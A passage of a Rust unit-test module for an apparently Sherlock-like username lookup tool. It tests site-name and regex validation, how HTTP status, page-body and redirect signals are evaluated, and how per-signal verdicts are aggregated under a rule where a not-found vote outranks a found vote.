893 .contains("characters outside the allowed set"),
894 "expected unsafe-name rejection for {bad:?}, got {err}",
895 );
896 }
897 }
898
899 #[test]
900 fn validate_accepts_real_world_site_names() {
901 // Cross-check the validation against names we actually ship.
902 for ok in [
903 "GitHub",
904 "Steam Community (User)",
905 "X / Twitter",
906 "osu!",
907 "Eintracht Frankfurt Forum",
908 "Archive of Our Own",
909 "Career.habr",
910 "fl",
911 "GitLab.com",
912 "Sbazar.cz",
913 ] {
914 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
915 s.name = ok.into();
916 assert!(s.validate().is_ok(), "expected {ok:?} to validate");
917 }
918 }
919
920 #[test]
921 fn validate_rejects_overlong_name() {
922 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
923 s.name = "A".repeat(100);
924 let err = s.validate().unwrap_err();
925 assert!(err.to_string().contains("longer than"));
926 }
927
928 #[test]
929 fn validate_accepts_well_formed_regex_check() {
930 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
931 s.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
932 assert!(s.validate().is_ok());
933 }
934
935 #[test]
936 fn validate_tolerates_unsupported_regex_features() {
937 // Sherlock-imported regexes occasionally use lookarounds
938 // (e.g. `(?!...)`) that Rust's `regex` crate can't compile —
939 // those sites should still load, with the username-gate
940 // silently disabled rather than rejecting the whole site.
941 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
942 s.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
943 assert!(
944 s.validate().is_ok(),
945 "lookaround-bearing regex should warn, not reject the site"
946 );
947 }
948
949 #[test]
950 fn signal_status_found_votes_only_on_match() {
951 let signal = Signal::StatusFound { codes: vec![200] };
952 let probe = Probe {
953 status: 200,
954 final_url: "https://example.com/alice",
955 body: "",
956 };
957 assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
958 let probe = Probe {
959 status: 404,
960 ..probe
961 };
962 assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
963 }
964
965 #[test]
966 fn signal_status_not_found_votes_only_on_match() {
967 let signal = Signal::StatusNotFound { codes: vec![404] };
968 let probe = Probe {
969 status: 404,
970 final_url: "",
971 body: "",
972 };
973 assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
974 let probe = Probe {
975 status: 200,
976 ..probe
977 };
978 assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
979 }
980
981 #[test]
982 fn signal_body_absent_votes_not_found_when_text_present() {
983 let signal = Signal::BodyAbsent {
984 text: "Profile not found".into(),
985 };
986 let probe = Probe {
987 status: 200,
988 final_url: "",
989 body: "<h1>Profile not found</h1>",
990 };
991 assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
992 let probe = Probe {
993 body: "<h1>Welcome alice</h1>",
994 ..probe
995 };
996 assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
997 }
998
999 #[test]
1000 fn signal_redirect_absent_inspects_final_url() {
1001 let signal = Signal::RedirectAbsent {
1002 fragment: "/login".into(),
1003 };
1004 let probe = Probe {
1005 status: 200,
1006 final_url: "https://example.com/login?next=/alice",
1007 body: "",
1008 };
1009 assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
1010 let probe = Probe {
1011 final_url: "https://example.com/alice",
1012 ..probe
1013 };
1014 assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
1015 }
1016
1017 #[test]
1018 fn aggregate_found_when_only_found_signals_fire() {
1019 let kind = aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]);
1020 assert_eq!(kind, MatchKind::Found);
1021 }
1022
1023 #[test]
1024 fn aggregate_not_found_when_only_not_found_signals_fire() {
1025 let kind = aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]);
1026 assert_eq!(kind, MatchKind::NotFound);
1027 }
1028
1029 #[test]
1030 fn aggregate_not_found_wins_over_found() {
1031 // Negative-priority: a NotFound vote outranks a Found vote.
1032 let kind = aggregate([SignalVerdict::Found, SignalVerdict::NotFound]);
1033 assert_eq!(kind, MatchKind::NotFound);
1034 }
1035
1036 #[test]
1037 fn aggregate_uncertain_when_no_signals_fire() {
1038 let kind = aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]);
1039 assert_eq!(kind, MatchKind::Uncertain);
1040 }
1041
1042 #[test]
1043 fn aggregate_empty_is_uncertain() {
1044 let kind = aggregate(std::iter::empty());
1045 assert_eq!(kind, MatchKind::Uncertain);
1046 }
1047
1048 #[test]
1049 fn needs_body_is_true_only_for_body_signals() {
1050 assert!(!Signal::StatusFound { codes: vec![200] }.needs_body());
1051 assert!(!Signal::StatusNotFound { codes: vec![404] }.needs_body());
1052 assert!(
1053 !Signal::RedirectAbsent {
1054 fragment: "/login".into()
1055 }
1056 .needs_body()
1057 );
1058 assert!(Signal::BodyPresent { text: "x".into() }.needs_body());
1059 assert!(Signal::BodyAbsent { text: "x".into() }.needs_body());
1060 }
1061
1062 #[test]
1063 fn deserializes_signal_list() {
1064 let json = r#"{
1065 "name": "GitHub",
1066 "url": "https://github.com/{username}",
1067 "signals": [
1068 { "kind": "status_found", "codes": [200] },
1069 { "kind": "status_not_found", "codes": [404] }
1070 ]
1071 }"#;
1072 let site: Site = serde_json::from_str(json).unwrap();
1073 assert_eq!(site.name, "GitHub");
1074 assert_eq!(site.signals.len(), 2);
1075 site.validate().unwrap();
1076 }
1077
1078 proptest::proptest! {
1079 /// For any mix of per-signal verdicts, aggregation obeys the
1080 /// negative-priority spec: any NotFound wins; else any Found; else
1081 /// Uncertain.
1082 #[test]
1083 fn aggregate_matches_negative_priority_spec(
1084 votes in proptest::collection::vec(
1085 proptest::prop_oneof![
1086 proptest::strategy::Just(SignalVerdict::Found),
1087 proptest::strategy::Just(SignalVerdict::NotFound),
1088 proptest::strategy::Just(SignalVerdict::Ambiguous),
1089 ],
1090 0..16,
1091 ),
1092 ) {
1093 let kind = aggregate(votes.iter().copied());
1094 let expected = if votes.contains(&SignalVerdict::NotFound) {
1095 MatchKind::NotFound
1096 } else if votes.contains(&SignalVerdict::Found) {
1097 MatchKind::Found
1098 } else {
1099 MatchKind::Uncertain
1100 };
1101 proptest::prop_assert_eq!(kind, expected);
1102 }
1103 }
1104}